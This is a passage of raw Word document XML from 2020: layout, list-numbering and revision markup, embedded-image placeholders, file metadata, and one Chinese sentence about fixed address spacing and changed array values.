            <wp:extent cx="5274310" cy="597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A1D1" w14:textId="77777777" w:rsidR="00736985" w:rsidRDefault="00736985" w:rsidP="00736985">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00AC1C84">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1840797F" wp14:editId="7C81AD3D">
            <wp:extent cx="5274310" cy="6203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BF2B" w14:textId="77777777" w:rsidR="00736985" w:rsidRDefault="00736985" w:rsidP="0073698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但是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之间距离固定，因此三个地址是正确的，只是对应数组的值改变了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7218EF39" w14:textId="77777777" w:rsidR="005B461B" w:rsidRPr="00736985" w:rsidRDefault="005B461B" w:rsidP="00252ACE">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73858563" w14:textId="0BF64E67" w:rsidR="0031375E" w:rsidRPr="005B461B" w:rsidRDefault="0031375E" w:rsidP="00252ACE">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="0031375E" w:rsidRPr="005B461B" w:rsidSect="0066425A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31A3D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1CE260AE"/>
    <w:lvl w:ilvl="0" w:tplc="DE5E3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6ED87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103EB9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4ED4929E"/>
    <w:lvl w:ilvl="0" w:tplc="F7E24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E126BE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="43A0CAC4"/>
    <w:lvl w:ilvl="0" w:tplc="DA2EA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6E4D24"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0DD400C8"/>
    <w:lvl w:ilvl="0" w:tplc="83C46A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9A2570"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B3101AAE"/>
    <w:lvl w:ilvl="0" w:tplc="8CC8459A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9E7"/>
    <w:rsid w:val="00053D64"/>
    <w:rsid w:val="0006693D"/>
    <w:rsid w:val="00110E77"/>
    <w:rsid w:val="00157468"/>
    <w:rsid w:val="001706C2"/>
    <w:rsid w:val="00185756"/>
    <w:rsid w:val="0018589B"/>
    <w:rsid w:val="002465B6"/>
    <w:rsid w:val="0024740D"/>
    <w:rsid w:val="00252ACE"/>
    <w:rsid w:val="002705F6"/>
    <w:rsid w:val="002C5120"/>
    <w:rsid w:val="0031375E"/>
    <w:rsid w:val="005B461B"/>
    <w:rsid w:val="005C25F0"/>
    <w:rsid w:val="006271F8"/>
    <w:rsid w:val="006B08A1"/>
    <w:rsid w:val="0070323B"/>
    <w:rsid w:val="00736985"/>
    <w:rsid w:val="00762D78"/>
    <w:rsid w:val="007E61B9"/>
    <w:rsid w:val="00874F71"/>
    <w:rsid w:val="00A065CB"/>
    <w:rsid w:val="00AA46D1"/>
    <w:rsid w:val="00AB19E7"/>
    <w:rsid w:val="00BC6C65"/>
    <w:rsid w:val="00C24C44"/>
    <w:rsid w:val="00CC6E8A"/>
    <w:rsid w:val="00CD6D25"/>
    <w:rsid w:val="00CE2600"/>
    <w:rsid w:val="00D63021"/>
    <w:rsid w:val="00D91E1D"/>
    <w:rsid w:val="00F362E3"/>
    <w:rsid w:val="00F9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DD064"/>
  <w14:defaultImageDpi w14:val="32767"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{EAF569FC-2E0B-2C40-A9EE-A18BF1ABD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E61B9"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420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6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422</Words>
  <Characters>2407</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>20</Lines>
  <Paragraphs>5</Paragraphs>
  <ScaleCrop>false</ScaleCrop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鸣宇 马</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-06T02:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-06T02:30:00Z</dcterms:modified>
</cp:coreProperties>
</file>